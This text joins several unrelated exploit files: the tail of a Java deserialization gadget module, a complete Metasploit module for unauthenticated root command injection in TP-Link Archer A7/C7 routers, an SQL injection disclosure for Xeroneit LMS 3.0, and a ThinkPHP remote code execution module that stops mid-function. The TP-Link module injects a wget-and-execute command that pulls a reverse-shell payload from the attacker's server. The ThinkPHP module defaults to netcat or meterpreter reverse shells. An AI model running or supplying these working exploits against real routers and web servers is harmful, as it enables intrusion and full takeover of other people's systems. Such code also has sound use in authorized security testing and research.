Randomize for "evasion" 'type' => rand(8..42) # Randomize for "evasion" ) end # Convenience method to send our gadget to a URI with desired POST params def send_request_gadget(uri, vars_post = {}) print_status("Sending remote classloader gadget to #{full_uri(uri)}") vars_post['+defaultData'] = 'com.mchange.v2.c3p0.WrapperConnectionPoolDataSource' vars_post['defaultData.userOverridesAsString'] = "HexAsciiSerializedMap:#{go_go_gadget.unpack1('H*')};" send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'vars_post' => vars_post }, 0) end # Generate all marshalsec payloads for the Jackson marshaller: # java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a def go_go_gadget # Implementation of the Jackson marshaller's C3P0WrapperConnPool gadget: # https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/gadgets/C3P0WrapperConnPool.java gadget = Rex::Text.decode_base64( <<~EOF rO0ABXNyAD1jb20ubWNoYW5nZS52Mi5uYW1pbmcuUmVmZXJlbmNlSW5kaXJlY3RvciRSZWZl cmVuY2VTZXJpYWxpemVkYhmF0NEqwhMCAARMAAtjb250ZXh0TmFtZXQAE0xqYXZheC9uYW1p bmcvTmFtZTtMAANlbnZ0ABVMamF2YS91dGlsL0hhc2h0YWJsZTtMAARuYW1lcQB+AAFMAAly ZWZlcmVuY2V0ABhMamF2YXgvbmFtaW5nL1JlZmVyZW5jZTt4cHBwcHNyABZqYXZheC5uYW1p bmcuUmVmZXJlbmNl6MaeoqjpjQkCAARMAAVhZGRyc3QAEkxqYXZhL3V0aWwvVmVjdG9yO0wA DGNsYXNzRmFjdG9yeXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAFGNsYXNzRmFjdG9yeUxvY2F0 aW9ucQB+AAdMAAljbGFzc05hbWVxAH4AB3hwc3IAEGphdmEudXRpbC5WZWN0b3LZl31bgDuv AQMAA0kAEWNhcGFjaXR5SW5jcmVtZW50SQAMZWxlbWVudENvdW50WwALZWxlbWVudERhdGF0 ABNbTGphdmEvbGFuZy9PYmplY3Q7eHAAAAAAAAAAAHVyABNbTGphdmEubGFuZy5PYmplY3Q7 kM5YnxBzKWwCAAB4cAAAAApwcHBwcHBwcHBweHQABEhBQ0t0AANUSEV0AAZQTEFORVQ= EOF ) # Replace length-prefixed placeholder strings with our own gadget.sub!("\x00\x04HACK", packed_class_name) gadget.sub!("\x00\x03THE", packed_classloader_uri) gadget.sub("\x00\x06PLANET", packed_class_name) end # Convenience method to pack the classloader URI as a length-prefixed string def packed_classloader_uri "#{[@classloader_uri.length].pack('n')}#{@classloader_uri}" end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'openssl' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::Remote::Udp include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'TP-Link Archer A7/C7 Unauthenticated LAN Remote Code Execution', 'Description' => %q{ This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer), running on the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, firmware version 190726. The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does not need any authentication to abuse it. After exploitation, an attacker will be able to execute any command as root, including downloading and executing a binary from another host. This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro + Radek Domanski). }, 'License' => MSF_LICENSE, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module 'Radek Domanski <radek.domanski[at]gmail.com> @RabbitPro' # Vulnerability discovery and Metasploit module ], 'References' => [ [ 'URL', 'https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo'], [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb/lao_bomb.md'], [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/lao_bomb.md'], [ 'CVE', '2020-10882'], [ 'CVE', '2020-10883'], [ 'CVE', '2020-10884'], [ 'ZDI', '20-334'], [ 'ZDI', '20-335'], [ 'ZDI', '20-336' ] ], 'Privileged' => true, 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, 'Payload' => {}, 'Stance' => Msf::Exploit::Stance::Aggressive, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp', 'WfsDelay' => 15, }, 'Targets' => [ [ 'TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)',{} ] ], 'DisclosureDate' => "Mar 25 2020", 'DefaultTarget' => 0, ) ) register_options( [ Opt::RPORT(20002) ]) register_advanced_options( [ OptInt.new('MAX_WAIT', [true, 'Number of seconds to wait for payload download', 15]) ]) end def check begin res = send_request_cgi({ 'uri' => '/webpages/app.1564127413977.manifest', 'method' => 'GET', 'rport' => 80 }) if res && res.code == 200 return Exploit::CheckCode::Vulnerable end rescue ::Rex::ConnectionError pass end return Exploit::CheckCode::Unknown end def calc_checksum(packet) # reference table used to calculate the packet checksum # used by tdpd_pkt_calc_checksum (0x4037f0) # located at offset 0x0416e90 in the binary reference_tbl = [0x00, 0x00, 0x00, 0x00, 0x77, 0x07, 0x30, 0x96, 0xee, 0x0e, 0x61, 0x2c, 0x99, 0x09, 0x51, 0xba, 0x07, 0x6d, 0xc4, 0x19, 0x70, 0x6a, 0xf4, 0x8f, 0xe9, 0x63, 0xa5, 0x35, 0x9e, 0x64, 0x95, 0xa3, 0x0e, 0xdb, 0x88, 0x32, 0x79, 0xdc, 0xb8, 0xa4, 0xe0, 0xd5, 0xe9, 0x1e, 0x97, 0xd2, 0xd9, 0x88, 0x09, 0xb6, 0x4c, 0x2b, 0x7e, 0xb1, 0x7c, 0xbd, 0xe7, 0xb8, 0x2d, 0x07, 0x90, 0xbf, 0x1d, 0x91, 0x1d, 0xb7, 0x10, 0x64, 0x6a, 0xb0, 0x20, 0xf2, 0xf3, 0xb9, 0x71, 0x48, 0x84, 0xbe, 0x41, 0xde, 0x1a, 0xda, 0xd4, 0x7d, 0x6d, 0xdd, 0xe4, 0xeb, 0xf4, 0xd4, 0xb5, 0x51, 0x83, 0xd3, 0x85, 0xc7, 0x13, 0x6c, 0x98, 0x56, 0x64, 0x6b, 0xa8, 0xc0, 0xfd, 0x62, 0xf9, 0x7a, 0x8a, 0x65, 0xc9, 0xec, 0x14, 0x01, 0x5c, 0x4f, 0x63, 0x06, 0x6c, 0xd9, 0xfa, 0x0f, 0x3d, 0x63, 0x8d, 0x08, 0x0d, 0xf5, 0x3b, 0x6e, 0x20, 0xc8, 0x4c, 0x69, 0x10, 0x5e, 0xd5, 0x60, 0x41, 0xe4, 0xa2, 0x67, 0x71, 0x72, 0x3c, 0x03, 0xe4, 0xd1, 0x4b, 0x04, 0xd4, 0x47, 0xd2, 0x0d, 0x85, 0xfd, 0xa5, 0x0a, 0xb5, 0x6b, 0x35, 0xb5, 0xa8, 0xfa, 0x42, 0xb2, 0x98, 0x6c, 0xdb, 0xbb, 0xc9, 0xd6, 0xac, 0xbc, 0xf9, 0x40, 0x32, 0xd8, 0x6c, 0xe3, 0x45, 0xdf, 0x5c, 0x75, 0xdc, 0xd6, 0x0d, 0xcf, 0xab, 0xd1, 0x3d, 0x59, 0x26, 0xd9, 0x30, 0xac, 0x51, 0xde, 0x00, 0x3a, 0xc8, 0xd7, 0x51, 0x80, 0xbf, 0xd0, 0x61, 0x16, 0x21, 0xb4, 0xf4, 0xb5, 0x56, 0xb3, 0xc4, 0x23, 0xcf, 0xba, 0x95, 0x99, 0xb8, 0xbd, 0xa5, 0x0f, 0x28, 0x02, 0xb8, 0x9e, 0x5f, 0x05, 0x88, 0x08, 0xc6, 0x0c, 0xd9, 0xb2, 0xb1, 0x0b, 0xe9, 0x24, 0x2f, 0x6f, 0x7c, 0x87, 0x58, 0x68, 0x4c, 0x11, 0xc1, 0x61, 0x1d, 0xab, 0xb6, 0x66, 0x2d, 0x3d, 0x76, 0xdc, 0x41, 0x90, 0x01, 0xdb, 0x71, 0x06, 0x98, 0xd2, 0x20, 0xbc, 0xef, 0xd5, 0x10, 0x2a, 0x71, 0xb1, 0x85, 0x89, 0x06, 0xb6, 0xb5, 0x1f, 0x9f, 0xbf, 0xe4, 0xa5, 0xe8, 0xb8, 0xd4, 0x33, 0x78, 0x07, 0xc9, 0xa2, 0x0f, 0x00, 0xf9, 0x34, 0x96, 0x09, 0xa8, 0x8e, 0xe1, 0x0e, 0x98, 0x18, 0x7f, 0x6a, 0x0d, 0xbb, 0x08, 0x6d, 0x3d, 0x2d, 0x91, 0x64, 0x6c, 0x97, 0xe6, 0x63, 0x5c, 0x01, 0x6b, 0x6b, 0x51, 0xf4, 0x1c, 0x6c, 0x61, 0x62, 0x85, 0x65, 0x30, 0xd8, 0xf2, 0x62, 0x00, 0x4e, 0x6c, 0x06, 0x95, 0xed, 0x1b, 0x01, 0xa5, 0x7b, 0x82, 0x08, 0xf4, 0xc1, 0xf5, 0x0f, 0xc4, 0x57, 0x65, 0xb0, 0xd9, 0xc6, 0x12, 0xb7, 0xe9, 0x50, 0x8b, 0xbe, 0xb8, 0xea, 0xfc, 0xb9, 0x88, 0x7c, 0x62, 0xdd, 0x1d, 0xdf, 0x15, 0xda, 0x2d, 0x49, 0x8c, 0xd3, 0x7c, 0xf3, 0xfb, 0xd4, 0x4c, 0x65, 0x4d, 0xb2, 0x61, 0x58, 0x3a, 0xb5, 0x51, 0xce, 0xa3, 0xbc, 0x00, 0x74, 0xd4, 0xbb, 0x30, 0xe2, 0x4a, 0xdf, 0xa5, 0x41, 0x3d, 0xd8, 0x95, 0xd7, 0xa4, 0xd1, 0xc4, 0x6d, 0xd3, 0xd6, 0xf4, 0xfb, 0x43, 0x69, 0xe9, 0x6a, 0x34, 0x6e, 0xd9, 0xfc, 0xad, 0x67, 0x88, 0x46, 0xda, 0x60, 0xb8, 0xd0, 0x44, 0x04, 0x2d, 0x73, 0x33, 0x03, 0x1d, 0xe5, 0xaa, 0x0a, 0x4c, 0x5f, 0xdd, 0x0d, 0x7c, 0xc9, 0x50, 0x05, 0x71, 0x3c, 0x27, 0x02, 0x41, 0xaa, 0xbe, 0x0b, 0x10, 0x10, 0xc9, 0x0c, 0x20, 0x86, 0x57, 0x68, 0xb5, 0x25, 0x20, 0x6f, 0x85, 0xb3, 0xb9, 0x66, 0xd4, 0x09, 0xce, 0x61, 0xe4, 0x9f, 0x5e, 0xde, 0xf9, 0x0e, 0x29, 0xd9, 0xc9, 0x98, 0xb0, 0xd0, 0x98, 0x22, 0xc7, 0xd7, 0xa8, 0xb4, 0x59, 0xb3, 0x3d, 0x17, 0x2e, 0xb4, 0x0d, 0x81, 0xb7, 0xbd, 0x5c, 0x3b, 0xc0, 0xba, 0x6c, 0xad, 0xed, 0xb8, 0x83, 0x20, 0x9a, 0xbf, 0xb3, 0xb6, 0x03, 0xb6, 0xe2, 0x0c, 0x74, 0xb1, 0xd2, 0x9a, 0xea, 0xd5, 0x47, 0x39, 0x9d, 0xd2, 0x77, 0xaf, 0x04, 0xdb, 0x26, 0x15, 0x73, 0xdc, 0x16, 0x83, 0xe3, 0x63, 0x0b, 0x12, 0x94, 0x64, 0x3b, 0x84, 0x0d, 0x6d, 0x6a, 0x3e, 0x7a, 0x6a, 0x5a, 0xa8, 0xe4, 0x0e, 0xcf, 0x0b, 0x93, 0x09, 0xff, 0x9d, 0x0a, 0x00, 0xae, 0x27, 0x7d, 0x07, 0x9e, 0xb1, 0xf0, 0x0f, 0x93, 0x44, 0x87, 0x08, 0xa3, 0xd2, 0x1e, 0x01, 0xf2, 0x68, 0x69, 0x06, 0xc2, 0xfe, 0xf7, 0x62, 0x57, 0x5d, 0x80, 0x65, 0x67, 0xcb, 0x19, 0x6c, 0x36, 0x71, 0x6e, 0x6b, 0x06, 0xe7, 0xfe, 0xd4, 0x1b, 0x76, 0x89, 0xd3, 0x2b, 0xe0, 0x10, 0xda, 0x7a, 0x5a, 0x67, 0xdd, 0x4a, 0xcc, 0xf9, 0xb9, 0xdf, 0x6f, 0x8e, 0xbe, 0xef, 0xf9, 0x17, 0xb7, 0xbe, 0x43, 0x60, 0xb0, 0x8e, 0xd5, 0xd6, 0xd6, 0xa3, 0xe8, 0xa1, 0xd1, 0x93, 0x7e, 0x38, 0xd8, 0xc2, 0xc4, 0x4f, 0xdf, 0xf2, 0x52, 0xd1, 0xbb, 0x67, 0xf1, 0xa6, 0xbc, 0x57, 0x67, 0x3f, 0xb5, 0x06, 0xdd, 0x48, 0xb2, 0x36, 0x4b, 0xd8, 0x0d, 0x2b, 0xda, 0xaf, 0x0a, 0x1b, 0x4c, 0x36, 0x03, 0x4a, 0xf6, 0x41, 0x04, 0x7a, 0x60, 0xdf, 0x60, 0xef, 0xc3, 0xa8, 0x67, 0xdf, 0x55, 0x31, 0x6e, 0x8e, 0xef, 0x46, 0x69, 0xbe, 0x79, 0xcb, 0x61, 0xb3, 0x8c, 0xbc, 0x66, 0x83, 0x1a, 0x25, 0x6f, 0xd2, 0xa0, 0x52, 0x68, 0xe2, 0x36, 0xcc, 0x0c, 0x77, 0x95, 0xbb, 0x0b, 0x47, 0x03, 0x22, 0x02, 0x16, 0xb9, 0x55, 0x05, 0x26, 0x2f, 0xc5, 0xba, 0x3b, 0xbe, 0xb2, 0xbd, 0x0b, 0x28, 0x2b, 0xb4, 0x5a, 0x92, 0x5c, 0xb3, 0x6a, 0x04, 0xc2, 0xd7, 0xff, 0xa7, 0xb5, 0xd0, 0xcf, 0x31, 0x2c, 0xd9, 0x9e, 0x8b, 0x5b, 0xde, 0xae, 0x1d, 0x9b, 0x64, 0xc2, 0xb0, 0xec, 0x63, 0xf2, 0x26, 0x75, 0x6a, 0xa3, 0x9c, 0x02, 0x6d, 0x93, 0x0a, 0x9c, 0x09, 0x06, 0xa9, 0xeb, 0x0e, 0x36, 0x3f, 0x72, 0x07, 0x67, 0x85, 0x05, 0x00, 0x57, 0x13, 0x95, 0xbf, 0x4a, 0x82, 0xe2, 0xb8, 0x7a, 0x14, 0x7b, 0xb1, 0x2b, 0xae, 0x0c, 0xb6, 0x1b, 0x38, 0x92, 0xd2, 0x8e, 0x9b, 0xe5, 0xd5, 0xbe, 0x0d, 0x7c, 0xdc, 0xef, 0xb7, 0x0b, 0xdb, 0xdf, 0x21, 0x86, 0xd3, 0xd2, 0xd4, 0xf1, 0xd4, 0xe2, 0x42, 0x68, 0xdd, 0xb3, 0xf8, 0x1f, 0xda, 0x83, 0x6e, 0x81, 0xbe, 0x16, 0xcd, 0xf6, 0xb9, 0x26, 0x5b, 0x6f, 0xb0, 0x77, 0xe1, 0x18, 0xb7, 0x47, 0x77, 0x88, 0x08, 0x5a, 0xe6, 0xff, 0x0f, 0x6a, 0x70, 0x66, 0x06, 0x3b, 0xca, 0x11, 0x01, 0x0b, 0x5c, 0x8f, 0x65, 0x9e, 0xff, 0xf8, 0x62, 0xae, 0x69, 0x61, 0x6b, 0xff, 0xd3, 0x16, 0x6c, 0xcf, 0x45, 0xa0, 0x0a, 0xe2, 0x78, 0xd7, 0x0d, 0xd2, 0xee, 0x4e, 0x04, 0x83, 0x54, 0x39, 0x03, 0xb3, 0xc2, 0xa7, 0x67, 0x26, 0x61, 0xd0, 0x60, 0x16, 0xf7, 0x49, 0x69, 0x47, 0x4d, 0x3e, 0x6e, 0x77, 0xdb, 0xae, 0xd1, 0x6a, 0x4a, 0xd9, 0xd6, 0x5a, 0xdc, 0x40, 0xdf, 0x0b, 0x66, 0x37, 0xd8, 0x3b, 0xf0, 0xa9, 0xbc, 0xae, 0x53, 0xde, 0xbb, 0x9e, 0xc5, 0x47, 0xb2, 0xcf, 0x7f, 0x30, 0xb5, 0xff, 0xe9, 0xbd, 0xbd, 0xf2, 0x1c, 0xca, 0xba, 0xc2, 0x8a, 0x53, 0xb3, 0x93, 0x30, 0x24, 0xb4, 0xa3, 0xa6, 0xba, 0xd0, 0x36, 0x05, 0xcd, 0xd7, 0x06, 0x93, 0x54, 0xde, 0x57, 0x29, 0x23, 0xd9, 0x67, 0xbf, 0xb3, 0x66, 0x7a, 0x2e, 0xc4, 0x61, 0x4a, 0xb8, 0x5d, 0x68, 0x1b, 0x02, 0x2a, 0x6f, 0x2b, 0x94, 0xb4, 0x0b, 0xbe, 0x37, 0xc3, 0x0c, 0x8e, 0xa1, 0x5a, 0x05, 0xdf, 0x1b, 0x2d, 0x02, 0xef, 0x8d] res = 0xffffffff # main checksum calculation packet.each_entry { |c| index = ((c ^ res) & 0xff) * 4 # .reverse is needed as the target is big endian ref = (reference_tbl[index..index+3].reverse.pack('C*').unpack('L').first) res = ref ^ (res >> 8) } checksum = ~res checksum_s = [(checksum)].pack('I>').force_encoding("ascii") # convert back to string packet = packet.pack('C*').force_encoding('ascii') # and replace the checksum packet[12] = checksum_s[0] packet[13] = checksum_s[1] packet[14] = checksum_s[2] packet[15] = checksum_s[3] packet end def aes_encrypt(plaintext) # Function encrypts perfectly 16 bytes aligned payload if (plaintext.length % 16 != 0) return end cipher = OpenSSL::Cipher.new 'AES-128-CBC' # in the original C code the key and IV are 256 bits long... but they still use AES-128 iv = "1234567890abcdef" key = "TPONEMESH_Kf!xn?" encrypted = '' cipher.encrypt cipher.iv = iv cipher.key = key # Take each 16 bytes block and encrypt it plaintext.scan(/.{1,16}/) { |block| encrypted += cipher.update(block) } encrypted end def create_injection(c) # Template for the command injection # The injection happens at "slave_mac" (read advisory for details) # The payload will have to be padded to exactly 16 bytes to ensure reliability between different OpenSSL versions. # This will fail if we send a command with single quotes (') # ... but that's not a problem for this module, since we don't use them for our command. # It might also fail with double quotes (") since this will break the JSON... inject = "\';printf \'#{c}\'>>#{@cmd_file}\'" template = "{\"method\":\"slave_key_offer\",\"data\":{"\ "\"group_id\":\"#{rand_text_numeric(1..3)}\","\ "\"ip\":\"#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}\","\ "\"slave_mac\":\"%{INJECTION}\","\ "\"slave_private_account\":\"#{rand_text_alpha(5..13)}\","\ "\"slave_private_password\":\"#{rand_text_alpha(5..13)}\","\ "\"want_to_join\":false,"\ "\"model\":\"#{rand_text_alpha(5..13)}\","\ "\"product_type\":\"#{rand_text_alpha(5..13)}\","\ "\"operation_mode\":\"A%{PADDING}\"}}" # This is required to calculate exact template length without replace flags template_len = template.length - '%{INJECTION}'.length - '%{PADDING}'.length # This has to be initialized to cover the situation when no padding is needed pad = '' padding = rand_text_alpha(16) template_len += inject.length # Calculate pad if padding is needed if (template_len % 16 != 0) pad = padding[0..15-(template_len % 16)] end # Here the final payload is created template % {INJECTION:"#{inject}", PADDING:"#{pad}"} end def update_len_field(packet, payload_length) new_packet = packet[0..3] new_packet += [payload_length].pack("S>") new_packet += packet[6..-1] end def exec_cmd_file(packet) # This function handles special action of exec # Returns new complete tpdp packet inject = "\';sh #{@cmd_file}\'" payload = create_injection(inject) ciphertext = aes_encrypt(payload) if not ciphertext fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!") end new_packet = packet[0..15] new_packet += ciphertext new_packet = update_len_field(new_packet, ciphertext.length) calc_checksum(new_packet.bytes) end # Handle incoming requests from the router def on_request_uri(cli, request) print_good("#{peer} - Sending executable to the router") print_good("#{peer} - Sit back and relax, Shelly will come visit soon!") send_response(cli, @payload_exe) @payload_sent = true end def exploit if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST") end if datastore['SSL'] fail_with(Failure::Unknown, "SSL is not supported on this target, please disable it") end print_status("Attempting to exploit #{target.name}") tpdp_packet_template = [0x01].pack('C*') + # packet version, fixed to 1 [0xf0].pack('C*') + # set packet type to 0xf0 (onemesh) [0x07].pack('S>*') + # onemesh opcode, used by the onemesh_main switch table [0x00].pack('S>*') + # packet len [0x01].pack('C*') + # some flag, has to be 1 to enter the vulnerable onemesh function [0x00].pack('C*') + # dunno what this is [rand(0xff),rand(0xff),rand(0xff),rand(0xff)].pack('C*') + # serial number, can by any value [0x5A,0x6B,0x7C,0x8D].pack('C*') # Checksum placeholder srv_host = datastore['SRVHOST'] srv_port = datastore['SRVPORT'] @cmd_file = rand_text_alpha_lower(1) # generate our payload executable @payload_exe = generate_payload_exe # Command that will download @payload_exe and execute it download_cmd = "wget http://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}" http_service = 'http://' + srv_host + ':' + srv_port.to_s print_status("Starting up our web service on #{http_service} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => "/#{@cmd_file}" }}) print_status("#{peer} - Connecting to the target") connect_udp print_status("#{peer} - Sending command file byte by byte") print_status("#{peer} - Command: #{download_cmd}") mod = download_cmd.length / 5 download_cmd.each_char.with_index { |c, index| # Generate payload payload = create_injection(c) if not payload fail_with(Failure::Unknown, "#{peer} - Failed to setup download command!") end # Encrypt payload ciphertext = aes_encrypt(payload) if not ciphertext fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!") end tpdp_packet = tpdp_packet_template.dup tpdp_packet += ciphertext tpdp_packet = update_len_field(tpdp_packet, ciphertext.length) tpdp_packet = calc_checksum(tpdp_packet.bytes) udp_sock.put(tpdp_packet) # Sleep to make sure the payload is processed by a target Rex.sleep(1) # Print progress if ((index+1) % mod == 0) percentage = 20 * ((index+1) / mod) # very advanced mathemathics in use here to show the progress bar print_status("#{peer} - [0%]=#{' =' * ((percentage*2/10-1)-1)}>#{' -'*(20-(percentage*2/10))}[100%]") if percentage == 100 # a bit of cheating to get the last char done right index = -2 end #print_status("#{peer} - #{download_cmd[0..index+1]}#{'-' * (download_cmd[index+1..-1].length-1)}") end } # Send the exec command. From here we should receive the connection print_status("#{peer} - Command file sent, attempting to execute...") tpdp_packet = exec_cmd_file(tpdp_packet_template.dup) udp_sock.put(tpdp_packet) timeout = 0 while not @payload_sent Rex.sleep(1) timeout += 1 if timeout == datastore['MAX_WAIT'].to_i fail_with(Failure::Unknown, "#{peer} - Timeout reached! Payload was not downloaded :(") end end disconnect_udp end end

# Exploit Title: Xeroneit Library Management System 3.0 - 'category' SQL Injection # Google Dork: "LMS v3.0 - Xerone IT " # Date: 2020-04-09 # Exploit Author: Sohel Yousef jellyfish security team # Software Link: https://xeroneit.net/portfolio/library-management-system-lms # Software Demo :https://xeroneit.co/demo/lms/home/login # Version: v3.0 # Category: webapps 1. Description scritp has SQLI in books category at this dir /lms/home/book?category_name=00*SQLI Error Number: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0' GROUP BY `title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21' at line 3 SELECT sum(cast(cast(book_info.status as char) as SIGNED)) as available_book, `book_info`.`number_of_books`, `book_info`.`id`, `book_info`.`category_id`, `book_info`.`title`, `book_info`.`size1` as `size`, `book_info`.`publishing_year`, `book_info`.`publisher`, `book_info`.`edition_year`, `book_info`.`subtitle`, `book_info`.`edition`, `book_info`.`isbn`, `book_info`.`author`, `book_info`.`cover`, `book_info`.`add_date` FROM `book_info` WHERE FIND_IN_SET('57'', category_id) !=0 AND `book_info`.`deleted` = '0' GROUP BY `title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21 Filename: models/Basic.php Line Number: 284

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::AutoCheck include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'ThinkPHP Multiple PHP Injection RCEs', 'Description' => %q{ This module exploits one of two PHP injection vulnerabilities in the ThinkPHP web framework to execute code as the web user. Versions up to and including 5.0.23 are exploitable, though 5.0.23 is vulnerable to a separate vulnerability. The module will automatically attempt to detect the version of the software. Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub. }, 'Author' => [ # Discovery by unknown threaty threat actors 'wvu' # Module ], 'References' => [ # https://www.google.com/search?q=thinkphp+rce, tbh ['CVE', '2018-20062'], # NoneCMS 1.3 using ThinkPHP ['CVE', '2019-9082'], # Open Source BMS 1.1.1 using ThinkPHP ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce'], ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce'] ], 'DisclosureDate' => '2018-12-10', # Unknown discovery date 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => false, 'Targets' => [ ['Unix Command', 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'} ], ['Linux Dropper', 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper, 'DefaultOptions' => { 'CMDSTAGER::FLAVOR' => :curl, 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } ] ], 'DefaultTarget' => 1, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } )) register_options([ Opt::RPORT(8080), OptString.new('TARGETURI', [true, 'Base path', '/']) ]) register_advanced_options([ # NOTE: You may want to tweak this for long-running commands like find(1) OptFloat.new('CmdOutputTimeout', [true, 'Timeout for cmd/unix/generic output', 3.5]) ]) # XXX: https://github.com/rapid7/metasploit-framework/issues/12963 import_target_defaults end =begin wvu@kharak:~$ curl -vs "http://127.0.0.1:8080/index.php?s=$((RANDOM))" | xmllint --html --xpath 'substring-after(//div[@class = "copyright"]/span[1]/text(), "V")' - * Trying 127.0.0.1... * TCP_NODELAY set * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0) > GET /index.php?s=1353 HTTP/1.1 > Host: 127.0.0.1:8080 > User-Agent: curl/7.54.0 > Accept: */* > < HTTP/1.1 404 Not Found < Date: Mon, 13 Apr 2020 06:42:15 GMT < Server: Apache/2.4.25 (Debian) < X-Powered-By: PHP/7.2.5 < Content-Length: 7332 < Content-Type: text/html; charset=utf-8 < { [7332 bytes data] * Connection #0 to host 127.0.0.1 left intact 5.0.20wvu@kharak:~$ =end def check # An unknown route will trigger the ThinkPHP copyright with version res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => {'s' => rand_text_alpha(8..42)} ) unless res return CheckCode::Unknown('Target did not respond to check request.') end unless res.code == 404 && res.body.match(/copyright.*ThinkPHP/m) return CheckCode::Unknown( 'Target did not respond with ThinkPHP copyright.' ) end # Get the first copyright <span> containing the version version = res.get_html_document.at('//div[@class = "copyright"]/span')&.text unless (version = version.scan(/^V([\d.]+)$/).flatten.first) return CheckCode::Detected( 'Target did not respond with ThinkPHP version.' ) end # Make the parsed version a comparable ivar for automatic exploitation @version = Gem::Version.new(version) if @version <= Gem::Version.new('5.0.23') return CheckCode::Appears("ThinkPHP #{@version} is a vulnerable version.") end CheckCode::Safe("ThinkPHP #{@version} is NOT a vulnerable version.") end def exploit # NOTE: Automatic check is implemented by the AutoCheck mixin super # This is just extra insurance in case I screwed up the check method unless @version fail_with(Failure::NoTarget, 'Could not detect ThinkPHP version') end print_status("Targeting ThinkPHP #{@version} automatically") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper # XXX: Only opts[:noconcat] may induce responses from the server execute_cmdstager else # This is just extra insurance in case I screwed up the info hash fail_with(Failure::NoTarget, "Could not select target #{target['Type']}") end end def execute_command(cmd, _opts = {}) vprint_status("Executing command: #{cmd}") if @version < Gem::Version.new('5.0.23') exploit_less_than_5_0_23(cmd) elsif @version == Gem::Version.new('5.0.23') exploit_5_0_23(cmd) else # This is just extra insurance in case I screwed up the exploit method fail_with(Failure::NoTarget, "Could not target ThinkPHP #{@version}") end end =begin wvu@kharak:~$ curl -gvs "http://127.0.0.1:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id" | head -1 * Trying 127.0.0.1... * TCP_NODELAY set * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0) > GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1 > Host: 127.0.0.1:8080 > User-Agent: curl/7.54.0 > Accept: */* > < HTTP/1.1 200 OK < Date: Mon, 13 Apr 2020 06:43:45 GMT < Server: Apache/2.4.25 (Debian) < X-Powered-By: PHP/7.2.5 < Vary: Accept-Encoding < Transfer-Encoding: chunked < Content-Type: text/html; charset=UTF-8 < { [60 bytes data] * Connection #0 to host 127.0.0.1 left intact uid=33(www-data) gid=33(www-data) groups=33(www-data) wvu@kharak:~$ =end def exploit_less_than_5_0_23(cmd) # XXX: The server may block on executing our payload and won't respond res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 's' => '/Index/\\think\\app/invokefunction', 'function' => 'call_user_func_array', 'vars[0]' => 'system', # TODO: Debug ARCH_PHP 'vars[1][]' => cmd }, 'partial' => true }, datastore['CmdOutputTimeout']) return unless res && res.code == 200 vprint_good("Successfully executed command: #{cmd}") return unless datastore['PAYLOAD'] == 'cmd/unix/generic' # HACK: Print half of the doubled-up command output vprint_line(res.body[0, 